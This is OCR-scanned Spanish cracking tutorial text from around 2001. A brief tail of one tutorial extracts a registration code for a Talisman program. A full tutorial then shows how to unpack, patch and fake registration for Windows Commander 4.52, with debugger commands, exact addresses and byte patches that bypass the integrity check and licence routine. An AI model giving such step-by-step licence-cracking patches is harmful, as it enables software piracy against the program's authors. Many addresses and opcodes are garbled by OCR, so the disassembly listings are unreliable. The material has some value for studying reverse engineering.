introducido; si la comparación dá cero como resultado (es decir, si son iguales) el proceso de registro de 
finaliza con éxito; en caso contrario se nos muestra el mensaje de error que hemos visto antes. 


Obviamente, lo más sencillo es que cuando en nuestro proceso de depuración del código del programa 
lleguemos a la posición '0177:0047EFAF CMP ESI,[EBP-04]', averiguemos qué es lo que contiene el registro 
ESI ya que se tratará del Code correcto. Para éllo, hacemos lo siguiente: 


:? esi 
000852AE 0000545454 " RO" 


El depurador responde mostrándonos primeramente el valor hexadecimal del contenido del registro ESl y, 
ésto es lo que nos interesa, el valor decimal: "545454". Este debe ser nuestro Code correcto. No nos resta 
más que comprobarlo. Para éllo, primero desactivamos los breakpoints que podamos tener activos en el 
despurador escribiendo "BD *" e introducimos "545454" como Code. ¡Este es el resultado! 


Lightt 


istered for MeGaBiTe 


Program by Arkadiy Istomin 


¿Dónde se guardan los detalles del registro? Se guardan en el Registro de Windows, en las subclaves 
'usercode' y 'username' de la clave 'Mi PCAHKEY_CURRENT_USERISoftwarel Lighttek1 Talisman'. Si eliminamos 
cualquiera de las dos subclaves, el programa devendrá nuevamente al estado de 'Unregistered'. (Lo digo para 
que pueda practicar). 


Generar Registration Code 


Bueno, con éste pequeño formulario podrá registrar el programa con su Name. En cualquier caso, no creo que 
nadie tenga ninguna dificultad si quiere escribir un KeyGen. 


Me gustaría saludar a mis crackers favoritos y de los que más he aprendido. 


Son éstos: Torntxdo, The SandMan, BalckB, +Fravia, TNT!, ECD, Karpoff, Wkt. Esto no quiere decir que no 
haya otros extraordinarios crackers. 


NOTA: Si le gusta el programa, cómprelo. Los programadores pierden demasiado tiempo desarrollando su 
software como para que vengamos nosotros y no les compensemos por su trabajo. 


¡No es justo! 


Ensayo por: MeGaBiTe 
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Programa: Windows Commander 4.52 

PROTECCION: Fichero llave 

Objetivo: Simular estar registrados 

Descripcion: Excelente programa para manejar ficheros en windows 

Dificultad: Entre fácil y media 

DOWNLOAD : http://www.ghisler.com/ 

Herramientas: Softice, W32dasm, Editor Hexadecimal, ProcDump 

CRACKER: SnOp FECHA: 15/2/2001 
INTRODUCCION 


Hola a todos ! En este tutorial voy a contar como simular estar registrados en el excelente programa 
"Windows Commander 4.52". 


Deciros ke voy a partir de la base ke los ke lean este tutorial tienen ya unos conocimientos de cracking 
básicos e incluso avanzados. No voy a explicar mucho como se usan los programas ke vamos a usar pero si lo 
ke se debe hacer. Por todo ello he puesto la dificultad de este tutorial en más bien media ke fácil. 


Por otro lado considero ke el programa en cuestión no es fácil de crackear (al menos con el método ke yo he 
usado he tardado un par de días en enterarme de como iba la copla). Bueno vamos a lo bueno. 


AL ATAKE 


PRIMERA PARTE: TRABAJEMOS A GUSTO, COÑO 


Pues si, lo primero es trabajar a gusto. Aunque como veréis mi objetivo final será hacer un "loader" y no haría falta 
descomprimir el archivo (ke como vamos a ver está comprimido con Aspack) lo vamos ha hacer pq de esta forma 
podremos desensamblarlo con el w32dasm con lo cual veremos mejor como va el tema. Entonces en la copia 
descomprimida realizaremos los cambios pertinentes para probarlos. 


Vamos allá. Empecemos abriendo el ejecutable principal con el PE editor del ProcDump (no sin antes haber realizado 
la correspondiente copia de seguridad del fichero ke luego pasa lo ke pasa...). Si nos fijamos hay una sección llamada 
Aspack ke nos informa perfectamente de como está comprimido. Yo lo voy a descomprimir "manualmente" pq 
ninguna de las versiones ke me venían en el ProcDump me funcionaba (bueno, de hecho tampoco las probé con esta 
versión del windows commander pero en la 4.51 no funcionaba ninguna). 


Antes ke nada debemos cambiar el valor de la sección CODE - Characteristics de CODOOO40 a E0000020 en el fichero 
wincmd32.exe pq de esta manera conseguiremos ke el Sice (Soft Ice) rompa al iniciar el programa cuando lo 
cargamos con el Symbol Loader. Si no lo hacemos el programa entra directamente y no podemos poner los breakpoints 
como queremos. 


Bien una vez hecho esto cargamos el ejecutable ke hemos modificado en el symbol loader y lo ejecutamos. Nusetro 
objetivo será encontrar el punto de entrada original y dumpear el programa al disco duro mediante el Proc Dump. Para 
descomprimirlo voy a usar una técnica ke aprendí gracias al tutorial de Nopper sobre el Acdsee 3.0. Según él, la 
estructura de muchos compresores es, muy por encima, la siguiente: 


PUSHAD 

CALL rutina de descompresión 

POPAD (cuyo opcode es 61, lo podemos mirar mediante el Soft Ice) 
salto al inicio del programa descomprimido 


Por lo tanto vamos a intentar encontrar este POPAD. Para hacerlo, como sabemos ke su opcode es 61, vamos ha buscar 
este opcode a partir de donde rompemos inicialmente. Es decir ke si nos fijamos inicialmente el softice al ejecutar el 
windows commander des del fichero comprimido rompe en 5AE0O1. Luego pondremos: 


S 5AE001 L FFFFFF 61 


Esto buscará el número 61 en el código a partir de la posición especificada, 5AEOO1, y tantos bytes de longitud como 
le digamos (en nuestro caso he puesto ffffff ke es más ke suficiente). Recordad ke todos los números ke pongo son en 
hexadecimal. Como ya he dicho este tutorial no es para novatos y por eso doy por sentado ke el sistema hexadecimal 
se domina (entre muchas otras cosas). Y es ke como dijo Torrente: "Esto no es Bambi..." 


Bien, vemos ke esto nos devuelve la posición 5AE337. Pero si ponemos un breakpoint en esta posición no romperá el 
programa, pq de hecho, este 61 no es una instrucción de POPAD sino ke es una parte de otra instrucción (no se cual, 
no me he molestado en mirarlo). Por eso ahora lo ke vamos ha hacer es repetir la búsqueda pero ahora a partir de la 
posición ke nos han dado: 


S 5AE338 L FFFFFF 61 (nótese ke he puesto 5AE338 y no 5AE337 pq tenemos ke buscar más allá de la posición ke 
nos han dado, pues si ponemos 5AE337 nos devolverá otra vez 5AE337). 


Bien, ahora nos devuelve la posición 5AE4F3. Ponemos un bpx (breakpoint on execution) en esta posición y pulsamos 
FS. Ahora sí. Ahora el Sice ha roto donde queríamos. Si ahora pulsamos Fl10 tres veces llegaremos a un ret. Si 
pulsamos F10 otra vez veremos ke el salto ke hace desde este ret es muy grande y ke aterriza en la posición 543530. 
Pues bien, este es el punto de entrada original antes de ke el programa fuera comprimido. Anotamos este número, 
salimos del programa y volvemos a ejecutarlo. Paramos en el ya mencionado ret y ahí ponemos A en el Sice, ke es el 
comando para editar código en ensamblador. Ponemos 


JMP EIP 


De esta forma el programa entra en un bucle infinito. Salgamos del Sice y carguemos el ProcDump. En el menú de 
tareas abiertas debería haber el Windows Commander. Le damos con el botón derecho y seleccionamos "Dump Full”. 
Ahora volvemos a seleccionar el Windows Commander en el menú de tareas ke se estan ejecutando y le damos a "Kill 
Task" para ke cierra la aplicación (pq está en un bucle infinito).De esta forma tendremos el ejecutable original 
descomprimido. Ahora solo nos falta editar con el PE editor la cabecera de este ejecutable ke hemos obtenido y 
sustituir su entry point por el original ke ya hemos obtenido (recordemos ke el número ke debemos introducir es el 
entry point ke hemos encontrado menos el Image Base ke es 400000). Total ke el numero ke debemos introducir es: 
543530 - 400000 = 143530. 


Pos bien, si ahora ejecutamos el programa mediante el ejecutable descomprimido este debería funcionar correctamente. 
Ahora lo podemos desensamblar con el w32dasm y tener un listado muerto ke siempre resulta útil. Un recomendación 
es ke hagáis también una copia de seguridad del ejecutable descomprimido. 


Antes de ponernos a registrar el programa en si debemos eliminar la protección ke comprueba si el ejecutable ha sido 
modificado. Supongo ke os habréis dado cuenta ke el programa cuando lleva unos segundos en funcionamiento nos 
muestra un mensaje diciendo ke el ejecutable ha sido modificado posiblemente un virus (aunque en este caso mejor ke 
dijera por un cracker...). Pos bien, el autor nos ayuda mucho pues pone el mensaje mediante un messageboxa. Por lo 
tanto ejecutamos el programa y ponemos: 


bpx MessageBoxA 


Esperamos unos segundos y el saltaremos al soft ice. Pulsamos F12 para salir de la función MessageBoxaA en si, le 
damos al enter y aterrizamos en la llamada ke hace el ejecutable del win. commander a esta función. Anotamos esta 
dirección, ke es 4EAC67 y vamos al w32dasm. Donde nos encontramos: 


* Referenced by a an or (C)onditional Jump at Address: 
:OO4EAOOS(C) Sram Este salto será la clave 


* Possible Reference to String Resource ID=01345: "Print" 


:004EAC21 6841050000 push 00000541 

:004EAC26 8B45FC mov eax, dword ptr [ebp-04] 

:004EAC29 ESSAGEFSFF call 00421AB8 

:004EACZE 50 push eax 

:004EAC2F ESC4ADFIFF call 004059F8 

:004EAC34 8B453FC mov eax, dword ptr [ebp-04] 

:004EAC37 C6801F05000000 mov byte ptr [eax+0000051F], 00 


* Possible Reference to String Resource ID=00016: "Specify file type” 


| 
:004EAC3E 6A10 push 00000010 
:004EAC40 ESFBADFIFF call 00405440 


* Possible Reference to String Resource ID=00016: "Specify file type” 
:004EAC45 6A1O0 push 00000010 
* Possible StringData Ref from Code Obj ->"Windows Commander" 


| 

:004EAC47 A104485400 mov eax, dword ptr [00544804] 

:004EAC4C 50 push eax 

:004EAC4D 8DESEAFDFFFF lea eax, dword ptr [ebp+ FFFFFDE4A] 

:004EACS3 ES7CFOFIFF call 00409CD4 

:004EAC58 50 push eax 

:004EAC59 8B453FC mov eax, dword ptr [ebp-04] 

:004EAC5C ESS76EF3FF call 0042 1AB8 

:004EAC61 50 push eax 

:004EAC62 ESEIADFIFF call 00405448 Serrano Este es el call al MessageBoxA 


:004EAC67 6A00 push 00000000 rara, Akí es donde aterrizamos después de pulsar F12 


Bien, pues como veis he marcado el salto al ke se llega a la pantalla de "possible virus". Si vamos a este salto en 


4EA9OS y lo evitamos (poiendo nop) vemos ke ya no nos dará este mensaje y ke no saldrá del programa por mucho 
tiempo ke pase. 


Bueno, de hecho no es cierto. ¿Qué pasa si creamos un directorio, copiamos un fichero, etc...? Pues ke justo después de 
hacer lo ke se le pide sale inmediatamente del programa. Creo ke por el mismo motivo ke antes, pq detecta ke el 
fichero ha sido modificado. Pues vamos a solucionarlo. 


Vemos ke si entramos en el menú de Ayuda del win. comm. y entramos en "Acerca de Windows Commander" nos 
muestra una pantalla donde dice ke no estamos registrados, bla, bla, bla... Pero lo más importante es ke cuando la 
cerramos el programa también sale. Esta ventana es también un MessageBoxA. Por lo tanto vamos ha poner un bpx 
MessageBoxA otra vez. Entramos en "Acerca de Windows Commander" y salta el Sice. Le damos a F12, a aceptar y 
volvemos al Sice en la posición 4EAC67. Le damos unas cuantas veces al F10 hasta ke llegamos a 4F3BAB ke es un 
jz (salta si 0). Vamos a ver este salto en el w32dasm: 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
:004F271A(U), :004F2751(U), :004F2760(U), :004F2770(U), :004F2780(U) 
:004F2790(U), :004F27A0(U), :004F27B0(U), :004F27E6(C), :004F27FA(U) 
:004F2812(U), :004F2824(U), :004F2838(U), :004F2854A(U), :004F285C(U) 
:004F2869(U), :004F287C(U), :004F289B(U), :004F28AF(U), :004F28C1(U) 
:004F28D3(U), :004F28E7(U), :004F2905(U), :004F29ID(U), :004F2953(U) 
:004F2978(U), :004F2984(U), :004F2998(U), :004F29AC(U), :004F29BE(U) 
:004F29DA(U), :004F29F9(U), :004F2A0E(U), :004F2A23(U), :004F2A36(U) 
:004F2A4F(U), :004F2A62(U), :004F2A75(U), :004F2A88(U), :004F2A9B(U) 
:004F2AAE(U), :004F2ABF(U), :004F2AD3(U), :004F2AE7(U), :004F2AFB(U) 
:004F2BOF(U), :004F2B34(U), :004F2B5E(U), :004F2B6F(U), :004F2B80(U) 
:004F2B8F(U), :004F2B9E(U), :004F2BAD(U), :004F2BBC(U), :004F2BCB(U) 
:004F2BDA(U), :004F2BE8(U), :004F2BF9(U), :004F2C0A(U), :004F2CIB(U) 
:004F2C2C(U), :004F2C44(U), :004F2C55(U), :004F2C66(U), :004F2C75(U) 
:004F2C84(U), :004F2C93(U), :004F2CA2(U), :004F2CB1(U), :004F2CC0(U) 
:004F2CCE(U), :004F2CDF(U), :004F2CF0(U), :004F2DO1(U), :004F2D12(U) 
:004F2D2A(U), :004F2D3C(U), :004F2D4E(U), :004F2D7D(C), :004F2D88(U) 
:004F2D9A(U), :004F2DB0(U), :004F2DC6(U), :004F2DE8(C), :004F2E25(U) 
:004F2E47(C), :004F2E84(U), :004F2E98(U), :004F2EAC(U), :004F2EC6(U) 
:004F2ED8(U), :004F2EEA(U), :004F2EF4(U), :004F2F08(U), :004F2F1F(U) 
:004F2F36(U), :004F2F4D(U), :004F2F64(U), :004F2F7B(U), :004F2F92(U) 
:004F2FA9(U), :004F2FCO(U), :004F2FD7(U), :004F2FE4(U), :004F2FF1(U) 
:004F3025(U), :004F3048(C), :004F3076(U), :004F3099(U), :004F30B9(U) 
:004F30D2(U), :004F30ES(U), :004F30F2(U), :004F3101(U), :004F310B(U) 
:004F3115(U), :004F311F(U), :004F3129(U), :004F3146(U), :004F3166(U) 
:004F3186(U), :004F3198(U), :004F31B7(U), :004F31D6(U), :004F31F5(U) 
:004F3214(U), :004F322A(U), :004F3249(U), :004F325F(U), :004F3285(U) 
:004F328F(U), :004F32AC(U), :004F32C9(U), :004F32D5(U), :004F32E1(U) 
:004F3310(U), :004F333F(U), :004F339A(C), :004F33BE(U), :004F33D8(U) 
:004F33F2(U), :004F3461(U), :004F34BD(U), :004F3501(U), :004F355D(U) 
:004F3567(U), :004F35D8(U), :004F3607(C), :004F3634(U), :004F364E(U) 
:004F3658(U), :004F3687(C), :004F36B4(U), :004F36CE(U), :004F36D8(U) 
:004F36E8(U), :004F3737(U), :004F3746(U), :004F3758(U), :004F3767(C) 
:004F3781(U), :004F3793(U), :004F37AS(U), :004F37B7(U), :004F37C9(U) 
:004F37DB(U), :004F3830(U), :004F3842(U), :004F3854(U), :004F38CC(U) 
:004F3985(U), :004F3997(U), :004F39EF(U), :004F3A03(U), :004F3AOF(C) 
:004F3A1C(U), :004F3A28(C), :004F3A35(U), :004F3A44(U), :004F3ASE(C) 
:004F3A69(U), :004F3ABB(U), :004F3AD6(U), :004F3B70(U), :004F3B7B(U) 
:004F3B84(U) 


:004F3BA1 A198525400 mov eax, dword ptr [00545298] 
:004F3BA6 2DB9230000 sub eax, 000023B9 
:O004F3BAB 740A je OO4F3BB7 —— So=--- Este es el salto en cuestión 


Espectacular verdad ? Fijaos cuantas saltos se refieren a esta parte del programa. Si lo comprobamos con el fichero 
original sin modificar en absoluto el programa salta en 4F3BAB. Si lo hacemos des del fichero modificado no salta. 
Por lo tanto sustituiremos este je por un jmp incondicional. Para ello bastará con sustituir el 740A por EBOA (por ke 
EB significa salto incondicional y OA es la distancia a la ke saltará, ke es la misma ke en el je). 


Pues bien, ahora el programa ya no sale por na del mundo a menos ke nosotros se lo ordenemos. Por lo tanto ya 
podemos TRABAJAR COMODAMENTE. 


SEGUNDA PARTE: EL CRACK EN SI 


Bueno, esta parte ke hemos hecho era la sencilla. Ahora llega el curro de verdad. En realidad para mi lo complicado en 
este caso fue dar con la rutina de comprobación de registro. Y después empanarme de como crackearla. Pero de hecho 
es fácil (una vez lo sabes, claro está). Yo me tiré unos dias pa encontrarlo todo, pero yo os voy a dar la receta fácil con 
cierto truquillo. El truquillo consiste en buscar en el w32dasm la cadena de texto: "User licence". La encontramos en 
4D931C. Pues bien ahora vamos mirando donde empieza esta rutina, es decir buscamos algo del tipo "Referenced by a 
call at...". Lo encontramos bastante arriba: 


* Referenced by a CALL at Address: 
:004D6BI1IC 


:004D8CDO 55 push ebp 
:004D8CD1 8BEC mov ebp, esp 


También debemos encontrar el final de la rutina, para eso ponemos buscar en el menú para buscar el primer "ret" 
partiendo des del principio. Lo encontramos en 4D94DO9. Por lo tanto nuestra rutina de comprobación está 
comprendida entre 4D8CD0 y 4D94D09. Pos bien, si la miramos por encima a lo mejor no nos damos cuenta, pero si 
keremos llegar a ke se ejecute la parte donde dice User Licence (ke suponemos ke si se llega a ejecutar es pq cree ke el 
programa esta registrado) en realidad lo ke necesitamos es ke ebx sea diferente de 0. No voy a contar como se llega a 
esta conclusión, pq es largo, pero hay varias formas de verlo con solo mirar la porción de código ya mencionada y 
reparando en los test bl, bl ke hay dispersos por ahí (lo dejo como ejercicio). 


Pos bien, lo ke keremos nosotros es ke en ningún caso ebx sea 0. Para ke esto se cumpla debemos evitar ke se ejecuten 
todas las lineas del tipo: 


xor ebx, ebx 


Para ello nos situaremos al inicio de la rutina (en 4D8CDO0O) y pondremos find text en el w32dasm y buscaremos xor 
ebx, ebx. Iremos buscando hasta ke pasemos del final, es decir pararemos cuando encontremos un xor ebx, ebx ke esté 
más allá de 4D94D09. 


Encontraremos 6 xor ebx, ebx en : 
4D8DEO0, 4D9046, 4D90ED, 4D9146, 4D915C, 4D945D 


Ok, pero ahora lo ke tenemos ke hacer es ir al w32dasm y mirar todas las posiciones una a una. Para cada posición 
anotaremos el salto ke nos hace llegar a ella o ke lo evita. Es decir ke lo ke realmente nos importa es evitar ke se llegue 
a la linea del xor ebx, ebx, no bastará con nopear los xor ebx, ebx. Como son muchos yo pondré un par de ejemplos y 
vosotros haréis los demás. En el primer caso, el xor ebx, ebx de 4D8DEO: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
:004D8D9D(C) 


:004D8DB1 ESGAA7F2FF call 00403520 
:004D8DB6 83B80C00000000 cmp dword pr [eax+0000000C], 00000000 


:004D8DBD 7521 ¡ne OO4DEDEO SK rmmmnnmrrrrrrrrmoroo- Este es el salto ke lleba a xor ebx, ebx, lo evitaremos 
:004D8DBF 8D85E2FEFFFF lea eax, de [ebp+FFFFFEE2] 
:004D8DCS5 530 push eax 


:004D8DC6 8D9570FAFFFF lea edx, dword ptr [ebp+FFFFFA70] 
:004D8DCC 66B90004 mov cx, 0400 

:004D8DDO0 8BC6 mov eax, esi 

:004D8DD2 E83941F6FYF call 0043CF10 

:004D8DD7 8BC6 mov eax, esi 

:004D8DD9 E8C240F6FF call 0043CEAO 

:004D8DDE EBOB ¡mp 004D8DEB 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
:004D8DBD(C) 


:004D8DEO 33DB xor ebx, ebx rra Aquí está el primer xor ebx, ebx ke queremos evitar 
:004D8DE2 66C785E2FEFFFF0000 mov word ptr [ebp+FFFFFEE?2], 0000 


Como veis el salto ke debemos evitar es el de 4D8DBD. Os recomiendo ke os hagáis una pequeña lista con cada salto 
y al lado os pongáis lo ke debe hacer cada salto (pq hay saltos ke keremos ke salten y otros no). Es decir ke en este 
caso pondríamos: 


"4D8DBD evitar el salto" 


Por cierto, por si lo queréis saber este salto comprueba si existe un fichero llamado "wincmd.key" si está no salta y si 
está, salta hacia el código de no registrado. Si creáis el fichero wincmd.key veréis como este salto no haría falta 
modificarlo. 


Bien en el caso del xor ebx, ebx de 4D9046: 


:004D9040 0F84AE000000 je 004D90F4 
:004D9046 33DB xor ebx, ebx 


Bien, está claro ke el salto en 4D9040 debe saltar para evitar ke se ejecute el xor. Pondríamos en la lista: 


4D9040 debe saltar 


Bien, así lo haríamos con el resto de xor. Finalmente obtendríamos la lista siguiente: 

4D8DBD no debe saltar 

4D9050 debe saltar 

4D90ED no hace falta tocarlo pues ya tiene saltos incondicionales encima, luego nunca se ejecutará 
4D9144 debe saltar 

4D915A debe saltar 

4D945B debe saltar 


Muy bien, ahora pondríamos todos los breakpoints (el de 4D90ED vemos ke no hace falta) en esas direcciones y 
ejecutariamos el programa. Yo recomiendo ke al principio no modifiquemos nada, es decir ke al llegar a un salto, si 
por ejemplo es un jz y keremos ke salte y el sice nos indica ke tal y como estan las cosas no salta (al lado de la 
instrucción pone no jump) bastará con modificar el flag en cuestión. En este caso bastará con marcar en la pantalla de 
los registros del Sice (ke se activa poniendo wr) el registro en cuestión y pulsar "insert". De este modo vereis como 
donde antes ponía no jump ahora pone jump. 


Vale, pues si hacéis las pruebas veréis ke al final resulta ke solo nos hará falta modificar 3 de los saltos mencionados: 
4D8DBD lo "nopearemos" 


4D9040 cambiaremos de 0F84AE000000 a E9AF000000 90 (es decir un salto incondicional más un nop para ke 
Okupe los mismos bytes ke la instrucción inicial) 


4D945B forzaremos también el salto poniendo pasando de 7402 a EB02. 


Como habréis comprobado ahora ya no nos sale la nag screen y si vamos a "acerca de windows commander" nos pone 
ke estamos registrados y pone el user licence. Pero como veréis el nombre ke aparece es una mezcla de caracteres 
extraños. Esto se debe a ke la información de la persona ke se ha registrado la debería de recoger del fichero 
wincmd.key, pero este no existe (a menos ke lo hayas creado). En el siguiente apartado veremos como solucionar este 
problema sin tener ke crear el fichero wincmd.key ni nada. 


TERCERA PARTE: REGISTRADO A... 


Primero de todo deciros ke la idea de esta parte la saqué de un crack del windows commander 4.05 ke ya tenía hecho 
por otra persona. Es decir ke la idea de crackearlo así no es mia, pero voy a explicarla. 


La teoría es ke en alguna parte del código hay una función ke nos carga los datos "raros" ke vemos arriba o al abrir el 
menú de "acerca de windows commander". Estos datos, como ya he dicho, vendrían definidos por el fichero 
wincmd.key, pero yo no logré encontrar la manera en como se guardaban estos datos, y tampoco me maté mucho. En 
lugar de eso decidí ir directamente a esa función e intentar modificarla para ke me colocase en memoria los datos ke yo 
quisiera. Lo primero, pues, será encontrar dicha función. Esta función se encontrará dentro de la rutina ke hemos 
mencionado anteriormente, es decir, entre las líneas 4D8CDO y 4D94D0. Entre ellas encontraremos algún call ke una 
vez ejecutado dejará en memoria los extraños símbolos ke aparecen y ke deberían ser nuestro nombre o lo ke 
queramos. 


Utilicé un método rudimentario pero efectivo para averiguar cual era la función ke me cargaba los datos en memoria. 
Primero de todo me fijé en lo ke ponía arriba de la pantalla. Eran todo carácteres sin sentido, pero en mi caso había una 
secuencia por en medio ke ponia 74bC. Puse un bpx en 4D94D09, es decir al final de la función, en la instrucción ret. 
Ejecuté el programa con el breakpoint puesto y cuando se detuvo en 4D94D09 la teoría era ke la información de la 
cabecera ya debía estar en memoria pues se habría cargado en algún momento de la rutina. Sabía ke parte de esa 
información era 74bC. Así ke puse: 


S 0 L FFFFFF "74bC' Fijaos ke lo he puesto entre comillas simples pq estoy buscando ahora referencias de texto 
concretas y no un número como pasó cuando buscábamos el POPAD. Fijaos también ke se deben respetar las 
mayúsculas y las minúsculas. 


Muy bien, al poner esto apareció la cadena buscada en la pantalla de memoria. El resto de caracteres "ininteligibles" 
vemos ke son datos ke se salen del rango del código ASCII y ke por alguna razón se ponen caracteres "extraños" pues 


no sabe como interpretarlos. Pero por seguridad volví a repetir la búsqueda otra vez a partir de esta dirección de 
memoria ke en mi caso era 72F3F1: 


S 72F3F2 L FFFFFF "74bC' 


Con lo cual encontré otro lugar de memoria donde también havia esta información. Ya os digo ke lo primero ke hice 
fue aplicar la técnica ke comentaré a la primera vez ke encontré la información, pero no dió resultado, pq el resultado 
del primer lugar de memoria donde encontramos la información deseada está subeditado al segundo, es decir, depende 
de lo ke ya hubiera en el segundo lugar de memoria (ke en realidad se carga primero). Por lo tanto nosotros vamos a 
dejar en la pantalla el lugar donde está la información ke nos brinda la segunda búsqueda. 


Una vez tenemos la información ke keremos en la pantalla de memória ponemos un bpx al principio de la rutina de 
comprobación, es decir en 4D8CDO0. Volvemos ha arrancar el programa y este se detiene en 4D8CDO0 como es lógico. 
Si nos fijamos en ese momento en la pantalla de datos no aparecen los mismos datos ke antes. Por lo tanto los datos ke 
se colocarán en el marco de la pantalla aún no han sido cargados. Para encontrar la función donde se cargan yo empecé 
a pulsar F10 estando atento a la pantalla de memoria esperando cualquier modificación. Al cabo de bastantes 
pulsaciones (ya os he dicho ke era un método rudimentario) vi ke la información se cargaba en 4D8FEO. En esta 
dirección hay un CALL 4D8B34 ke es el siguiente: 


* Referenced by a CALL at Addresses: 
:004D8C2B , :004D8C3F , :004D8E7F', :004D8ED3 , :004D8FE0O 
:004D93FB , :004D96AE 


:004D8B34 53 push ebp 

:004D8B35 8BEC mov ebp, esp 

:004D8B37 83C4F8 add esp, FEFFFFFS 

:004D8B3A 53 push ebx 

:004D8B3B 56 push esi 

:004D8B3C 57 push edi 

:004D8B3D 8BF9 mov edi, ecx 

:004D8B3F 8945FC mov dword ptr [ebp-04], eax 
:004D8B42 891520703400 mov dword ptr [0054702C], edx 


* Possible Reference to String Resource ID=00020: "Enter file name to edit: " 
| 
:004D8B48 C745F814000000 mov [ebp-08], 00000014 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
:004D8BAS(C) 


:004D8B4F 8BF7 mov esi, edi 

:004D8B51 85FÓ6 test esi, esi 

:004D8B33 7C1C ¡l 004D8B71 

:004D8B933 46 inc esi 

:004D8B536 8B3DFC mov ebx, dword ptr [ebp-04] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
:004D8B6F(C) 


:004D8B39 8D4701 lea eax, dword ptr [edi+01] 
:004D8B3C ESS39FF2FF call 00402AB4 
:004D8B61 8B35FC mov edx, dword ptr [ebp-04] 
:004D8B64 03D0 add edx, eax 

:004D8B66 8BC3 mov eax, ebx 

:004D8B68 ESBBFFFFFF call 004D8B28 
:004D8B6D 43 inc ebx 

:004D8BO6E 4E dec esi 

:004D8B6F 75E8 ¡ne 004D8B59 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
:004D8B53(C) 


:004D8B71 8BF7 mov esi, edi 

:004D8B73 85FÓ6 test esi, esi 

:004D8B75 7C2B ¡l 004D8BA2 

:004D8B77 46 inc esi 

:004D8B78 8B3DFC mov ebx, dword ptr [ebp-04] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
:004D8BA0(C) 


* Possible Reference to String Resource ID=00008: "Do you really want to delete the Ji selected files/directori" 


:004D8B7B B808000000 mov eax, 00000008 
:004D8B80 ES2F9FF2FF call 00402AB4 
:004D8B83 8BDO mov edx, eax 

:004D8B87 8BC3 mov eax, ebx 


:004D8B89 EST6FFFFFF call 004D8B04 
:004D8B8E B800010000 mov eax, 00000100 
:004D8B93 ESIC9FF2FF call 00402AB4 
:004D8B98 8A13 mov dl, byte ptr [ebx] 
:004D8B9A 32C2 xor al, dl 

:004D8B9C 8803 mov byte ptr [ebx], al 
:004D8B9E 43 inc ebx 

:004D8B9F 4E dec esi 

:004D8BAO 753D9 jne 004D8B7B 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
:004D8B753(C) 


:004D8BA2 FF4DF38 dec [ebp-08] 
:004D8BAS 75A8 ¡ne 004D8B4F 
:004D8BA7 5F pop edi 
:004D8BAS 5E pop esi 
:004D8BA9 5B pop ebx 
:004D8BAA 539 pop ecx 
:004D8BAB 59 pop ecx 
:004D8BAC 5D pop ebp 
:004D8BAD C3 ret 


Pues muy bien, como esta llamada lo único ke hace es cargar los datos de la persona en memoria la sobreescribiremos 
y lo haremos "manualmente". Es decir vamos a fijarnos un poco a ver lo ke hace la rutina y vamos a sustituirla entera 
por una ke haga lo ke nosotros keramos. Lo primero de todo será ver dónde tenemos ke cargar los datos. Si nos fijamos 
vemos ke el primer dato ke lee a la hora de poner el texto en la pantalla es el ke está en la dirección de EAX al inicio 
de la rutina más 1A (siempre hablando en cifras en hexadecimal, por supuesto). Por lo tanto lo primero será sumar a 
EAX el valor 1A, por ejemplo con la función de suma ADD. Luego, a partir de ahí pondremos los sucesivos caracteres 
ke nosotros queramos de la forma: 


MOV byte ptr[E AX] n” de caracter en ASCII 
inc EAX (debemos incrementar eax para ke avance una posición de memoria) 
Total, ke al final la rutina ke nos quedará será la siguiente: 


* Referenced by a CALL at Addresses: 
|1:004D8C2B , :004D8C3F , :004D8E7F , :004D8SED3 , :004D8FEO 
[:004D93FB , :004D96AE 


DER 0517000000 add eax, 00000017 Kn Fijaos ke no he incrementado eax en lA directamente 
:004D8B39 C60000 mov byte ptr [eax], 00 sino ke previamente le he sumado 17 y luego 
3. 

:004D8B3C 0503000000 add eax, 00000003 El porque lo comento más abajo. 
:004D8B41 C60053 mov byte ptr [eax], 53 
:004D8B44 40 inc eax 

:004D8B45 C6006E mov byte ptr [eax], 6É 
:004D8B48 40 inc eax 

:004D8B49 C6004F mov byte ptr [eax], 4F 
:004D8B4C 40 inc eax 

:004D8B4D C60070 mov byte ptr [eax], 70 
:004D8B50 40 inc eax 

:004D8B51 C60020 mov byte ptr [eax], 20 
:004D8B54 40 inc eax 

:004D8B35 C60043 mov byte ptr [eax], 43 
:004D8B58 40 inc eax 

:004D8B59 C60072 mov byte ptr [eax], 72 
:004D8B5C 40 inc eax 

:004D8B3D C60061 mov byte ptr [eax], 61 
:004D8B60 40 inc eax 

:004D8B61 C60063 mov byte ptr [eax], 63 
:004D8B64 40 inc eax 

:004D8B65 C6006B mov byte ptr [eax], 6B 
:004D8B68 40 inc eax 

:004D8B69 C60065 mov byte ptr [eax], 65 
:004D8B6C 40 inc eax 

:004D8B6D C60064 mov byte ptr [eax], 64 
:004D8B70 40 inc eax 

:004D8B71 C60020 mov byte ptr [eax], 20 
:004D8B74 40 inc eax 

:004D8B75 C60056 mov byte ptr [eax], 56 


:004D8B78 40 inc eax 

:004D8B79 C60065 mov byte ptr [eax], 65 
:004D8B7C 40 inc eax 

:004D8B7D C60072 mov byte ptr [eax], 72 
:004D8B80 40 inc eax 

:004D8B81 C60073 mov byte ptr [eax], 73 
:004D8B84 40 inc eax 

:004D8B85 C60069 mov byte ptr [eax], 69 
:004D8B88 40 inc eax 

:004D8B89 C6006F mov byte ptr [eax], 6F 
:004D8B8C 40 inc eax 

:004D8B8D C6006É mov byte ptr [eax], 6É 
:004D8B90 40 inc eax 

:004D8B91 C60020 mov byte ptr [eax], 20 
:004D8B94 40 inc eax 

:004D8B95 C60032 mov byte ptr [eax], 32 
:004D8B98 40 inc eax 

:004D8B99 C60030 mov byte ptr [eax], 30 
:004D8B9C 40 inc eax 

:004D8B9D C60030 mov byte ptr [eax], 30 
:004D8BAO 40 inc eax 

:004D8BA1 C60031 mov byte ptr [eax], 31 
:004D8BA4 40 inc eax 

:004D8BAS C60020 mov byte ptr [eax], 20 
:004D8BA8 40 inc eax 

:004D8BA9 C60000 mov byte ptr [eax], 00 Sim El 0 es el código ke le hace "parar de escribir” 
:004D8BAC 90 nop 

:004D8BAD C3 ret 


